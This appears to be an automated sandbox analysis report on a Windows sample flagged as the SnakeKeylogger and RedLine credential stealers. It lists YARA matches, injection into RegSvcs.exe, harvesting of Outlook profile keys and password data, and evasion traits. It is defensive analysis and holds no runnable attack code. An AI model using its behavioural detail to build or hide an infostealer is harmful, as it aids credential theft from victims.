              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@3/3
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037A06A GetLastError,FormatMessageW,0_2_0037A06A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003681CB AdjustTokenPrivileges,CloseHandle,0_2_003681CB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003687E1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0037B333
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0038EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0038EE0D
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003883BB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00314E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00314E89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeFile created: C:\Users\user\AppData\Local\Temp\autE508.tmp
              Source: njVvgA8pEB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000033FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: njVvgA8pEB.exeVirustotal: Detection: 61%
              Source: njVvgA8pEB.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\njVvgA8pEB.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Users\user\Desktop\njVvgA8pEB.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wsock32.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: mpr.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeSection loaded: wldp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: njVvgA8pEB.exeStatic file information: File size 1118720 > 1048576
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: njVvgA8pEB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: njVvgA8pEB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037848F push FFFFFF8Bh; iretd 0_2_00378491
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033E70F push edi; ret 0_2_0033E711
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033E828 push esi; ret 0_2_0033E82A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00338945 push ecx; ret 0_2_00338958
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033EA03 push esi; ret 0_2_0033EA05
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033EAEC push edi; ret 0_2_0033EAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004231C8 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd 3_2_0040BBA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D46A1 push ebx; iretd 3_2_011D46A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03249877 push dword ptr [ebp+ecx-75h]; retf 3_2_03249882
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_032498E9 push dword ptr [ebp+ebx-75h]; iretd 3_2_032498ED
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003148D7
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00395376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00395376
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00333187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00333187
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI/Special instruction interceptor: Address: 12FA3C4
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI/Special instruction interceptor: Address: 16BEF5C
              Source: njVvgA8pEB.exe, 00000000.00000002.1722942325.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712410523.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712523859.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722715485.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722581179.0000000001563000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000002.1740455255.00000000015CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599739
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599553
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599265
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596783
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596487
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593992
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593867
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593756
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593625
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593516
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2180
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7635
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101613
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeAPI coverage: 4.5 %
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003149A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599739Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599553Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
